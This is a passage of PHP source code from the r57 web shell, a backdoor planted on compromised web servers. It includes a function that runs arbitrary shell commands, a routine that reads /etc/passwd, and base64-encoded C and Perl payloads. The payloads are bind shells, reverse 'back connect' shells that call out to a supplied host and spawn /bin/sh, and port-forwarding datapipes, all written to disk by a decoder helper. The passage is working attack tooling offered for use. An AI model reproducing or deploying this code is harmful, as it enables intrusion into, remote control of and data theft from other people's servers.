963 echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
964 }
965 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
966 die();
967 }
968if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
969$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
970if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
971function ws($i)
972{
973return @str_repeat("&nbsp;",$i);
974}
975function ex($cfe)
976{
977 $res = '';
978 if (!empty($cfe))
979 {
980 if(function_exists('exec'))
981 {
982 @exec($cfe,$res);
983 $res = join("\n",$res);
984 }
985 elseif(function_exists('shell_exec'))
986 {
987 $res = @shell_exec($cfe);
988 }
989 elseif(function_exists('system'))
990 {
991 @ob_start();
992 @system($cfe);
993 $res = @ob_get_contents();
994 @ob_end_clean();
995 }
996 elseif(function_exists('passthru'))
997 {
998 @ob_start();
999 @passthru($cfe);
1000 $res = @ob_get_contents();
1001 @ob_end_clean();
1002 }
1003 elseif(@is_resource($f = @popen($cfe,"r")))
1004 {
1005 $res = "";
1006 while(!@feof($f)) { $res .= @fread($f,1024); }
1007 @pclose($f);
1008 }
1009 }
1010 return $res;
1011}
1012function get_users()
1013{
1014 $users = array();
1015 $rows=file('/etc/passwd');
1016 if(!$rows) return 0;
1017 foreach ($rows as $string)
1018 {
1019 $user = @explode(":",$string);
1020 if(substr($string,0,1)!='#') array_push($users,$user[0]);
1021 }
1022 return $users;
1023}
1024function we($i)
1025{
1026if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }
1027else { $text = "[-] ERROR! Can't write in file "; }
1028echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
1029return null;
1030}
1031function re($i)
1032{
1033if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }
1034else { $text = "[-] ERROR! Can't read file "; }
1035echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
1036return null;
1037}
1038function ce($i)
1039{
1040if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }
1041else { $text = "Can't create "; }
1042echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
1043return null;
1044}
1045function fe($l,$n)
1046{
1047$text['ru'] = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????');
1048$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');
1049echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
1050return null;
1051}
1052function mr($l,$n)
1053{
1054$text['ru'] = array('?? ??????? ????????? ??????','?????? ??????????');
1055$text['eng'] = array('Can\'t send mail','Mail sent');
1056echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
1057return null;
1058}
1059function perms($mode)
1060{
1061if ($GLOBALS['windows']) return 0;
1062if( $mode & 0x1000 ) { $type='p'; }
1063else if( $mode & 0x2000 ) { $type='c'; }
1064else if( $mode & 0x4000 ) { $type='d'; }
1065else if( $mode & 0x6000 ) { $type='b'; }
1066else if( $mode & 0x8000 ) { $type='-'; }
1067else if( $mode & 0xA000 ) { $type='l'; }
1068else if( $mode & 0xC000 ) { $type='s'; }
1069else $type='u';
1070$owner["read"] = ($mode & 00400) ? 'r' : '-';
1071$owner["write"] = ($mode & 00200) ? 'w' : '-';
1072$owner["execute"] = ($mode & 00100) ? 'x' : '-';
1073$group["read"] = ($mode & 00040) ? 'r' : '-';
1074$group["write"] = ($mode & 00020) ? 'w' : '-';
1075$group["execute"] = ($mode & 00010) ? 'x' : '-';
1076$world["read"] = ($mode & 00004) ? 'r' : '-';
1077$world["write"] = ($mode & 00002) ? 'w' : '-';
1078$world["execute"] = ($mode & 00001) ? 'x' : '-';
1079if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
1080if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
1081if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
1082$s=sprintf("%1s", $type);
1083$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
1084$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
1085$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
1086return trim($s);
1087}
1088function in($type,$name,$size,$value)
1089{
1090 $ret = "<input type=".$type." name=".$name." ";
1091 if($size != 0) { $ret .= "size=".$size." "; }
1092 $ret .= "value=\"".$value."\">";
1093 return $ret;
1094}
1095function which($pr)
1096{
1097$path = ex("which $pr");
1098if(!empty($path)) { return $path; } else { return $pr; }
1099}
1100function cf($fname,$text)
1101{
1102 $w_file=@fopen($fname,"w") or we($fname);
1103 if($w_file)
1104 {
1105 @fputs($w_file,@base64_decode($text));
1106 @fclose($w_file);
1107 }
1108}
1109function sr($l,$t1,$t2)
1110 {
1111 return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
1112 }
1113if (!@function_exists("view_size"))
1114{
1115function view_size($size)
1116{
1117 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
1118 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
1119 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
1120 else {$size = $size . " B";}
1121 return $size;
1122}
1123}
1124function DirFiles($dir,$types='')
1125 {
1126 $files = Array();
1127 if(($handle = @opendir($dir)))
1128 {
1129 while (FALSE !== ($file = @readdir($handle)))
1130 {
1131 if ($file != "." && $file != "..")
1132 {
1133 if(!is_dir($dir."/".$file))
1134 {
1135 if($types)
1136 {
1137 $pos = @strrpos($file,".");
1138 $ext = @substr($file,$pos,@strlen($file)-$pos);
1139 if(@in_array($ext,@explode(';',$types)))
1140 $files[] = $dir."/".$file;
1141 }
1142 else
1143 $files[] = $dir."/".$file;
1144 }
1145 }
1146 }
1147 @closedir($handle);
1148 }
1149 return $files;
1150 }
1151 function DirFilesWide($dir)
1152 {
1153 $files = Array();
1154 $dirs = Array();
1155 if(($handle = @opendir($dir)))
1156 {
1157 while (false !== ($file = @readdir($handle)))
1158 {
1159 if ($file != "." && $file != "..")
1160 {
1161 if(@is_dir($dir."/".$file))
1162 {
1163 $file = @strtoupper($file);
1164 $dirs[$file] = '&lt;DIR&gt;';
1165 }
1166 else
1167 $files[$file] = @filesize($dir."/".$file);
1168 }
1169 }
1170 @closedir($handle);
1171 @ksort($dirs);
1172 @ksort($files);
1173 $files = @array_merge($dirs,$files);
1174 }
1175 return $files;
1176 }
1177 function DirFilesR($dir,$types='')
1178 {
1179 $files = Array();
1180 if(($handle = @opendir($dir)))
1181 {
1182 while (false !== ($file = @readdir($handle)))
1183 {
1184 if ($file != "." && $file != "..")
1185 {
1186 if(@is_dir($dir."/".$file))
1187 $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
1188 else
1189 {
1190 $pos = @strrpos($file,".");
1191 $ext = @substr($file,$pos,@strlen($file)-$pos);
1192 if($types)
1193 {
1194 if(@in_array($ext,explode(';',$types)))
1195 $files[] = $dir."/".$file;
1196 }
1197 else
1198 $files[] = $dir."/".$file;
1199 }
1200 }
1201 }
1202 @closedir($handle);
1203 }
1204 return $files;
1205 }
1206 function DirPrintHTMLHeaders($dir)
1207 {
1208 $pockets = '';
1209 $handle = @opendir($dir) or die("Can't open directory $dir");
1210 echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n";
1211 while (false !== ($file = @readdir($handle)))
1212 {
1213 if ($file != "." && $file != "..")
1214 {
1215 if(@is_dir($dir."/".$file))
1216 {
1217 echo " <li><b>[ $file ]</b></li>\n";
1218 DirPrintHTMLHeaders($dir."/".$file);
1219 }
1220 else
1221 {
1222 $pos = @strrpos($file,".");
1223 $ext = @substr($file,$pos,@strlen($file)-$pos);
1224 if(@in_array($ext,array('.htm','.html')))
1225 {
1226 $header = '-=None=-';
1227 $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
1228 for($a=0;$a<count($strings);$a++)
1229 {
1230 $pattern = '(<title>(.+)</title>)';
1231 if(@eregi($pattern,$strings[$a],$pockets))
1232 {
1233 $header = "&laquo;".$pockets[2]."&raquo;";
1234 break;
1235 }
1236 }
1237 echo " <li>".$header."</li>\n";
1238 }
1239 }
1240 }
1241 }
1242 echo " </ul>\n";
1243 @closedir($handle);
1244 }
1245
1246 class SearchResult
1247 {
1248 var $text;
1249 var $FilesToSearch;
1250 var $ResultFiles;
1251 var $FilesTotal;
1252 var $MatchesCount;
1253 var $FileMatschesCount;
1254 var $TimeStart;
1255 var $TimeTotal;
1256 var $titles;
1257 function SearchResult($dir,$text,$filter='')
1258 {
1259 $dirs = @explode(";",$dir);
1260 $this->FilesToSearch = Array();
1261 for($a=0;$a<count($dirs);$a++)
1262 $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
1263 $this->text = $text;
1264 $this->FilesTotal = @count($this->FilesToSearch);
1265 $this->TimeStart = getmicrotime();
1266 $this->MatchesCount = 0;
1267 $this->ResultFiles = Array();
1268 $this->FileMatchesCount = Array();
1269 $this->titles = Array();
1270 }
1271 function GetFilesTotal() { return $this->FilesTotal; }
1272 function GetTitles() { return $this->titles; }
1273 function GetTimeTotal() { return $this->TimeTotal; }
1274 function GetMatchesCount() { return $this->MatchesCount; }
1275 function GetFileMatchesCount() { return $this->FileMatchesCount; }
1276 function GetResultFiles() { return $this->ResultFiles; }
1277 function SearchText($phrase=0,$case=0) {
1278 $qq = @explode(' ',$this->text);
1279 $delim = '|';
1280 if($phrase)
1281 foreach($qq as $k=>$v)
1282 $qq[$k] = '\b'.$v.'\b';
1283 $words = '('.@implode($delim,$qq).')';
1284 $pattern = "/".$words."/";
1285 if(!$case)
1286 $pattern .= 'i';
1287 foreach($this->FilesToSearch as $k=>$filename)
1288 {
1289 $this->FileMatchesCount[$filename] = 0;
1290 $FileStrings = @file($filename) or @next;
1291 for($a=0;$a<@count($FileStrings);$a++)
1292 {
1293 $count = 0;
1294 $CurString = $FileStrings[$a];
1295 $CurString = @Trim($CurString);
1296 $CurString = @strip_tags($CurString);
1297 $aa = '';
1298 if(($count = @preg_match_all($pattern,$CurString,$aa)))
1299 {
1300 $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
1301 $this->ResultFiles[$filename][$a+1] = $CurString;
1302 $this->MatchesCount += $count;
1303 $this->FileMatchesCount[$filename] += $count;
1304 }
1305 }
1306 }
1307 $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
1308 }
1309 }
1310 function getmicrotime()
1311 {
1312 list($usec,$sec) = @explode(" ",@microtime());
1313 return ((float)$usec + (float)$sec);
1314 }
1315$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1316A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1317GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1318b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1319pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1320NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1321ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1322ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
13237DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
13249tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
13252ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1326dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1327lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1328$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1329VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1330JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1331TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1332lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1333Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1334Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1335lIENPTk47DQpleGl0IDA7DQp9DQp9";
1336$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1337aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1338hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1339sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1340kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1341KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1342OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1343$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1344BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1345SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1346KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1347sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1348Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1349QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1350Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1351$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1352x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1353HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1354aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1355lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1356xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1357W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1358LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1359udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
13600KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
1361iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1362KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1363gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1364hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1365iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1366ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1367vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1368AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1369QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1370ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1371gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1372wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
137329jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1374MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1375gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
13765zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1377HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1378dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1379KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1380ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1381E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1382Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1383NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1384J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1385CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1386dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1387gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1388lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1389$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1390CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1391bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1392gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1393NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1394iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1395aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1396SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1397xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1398WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
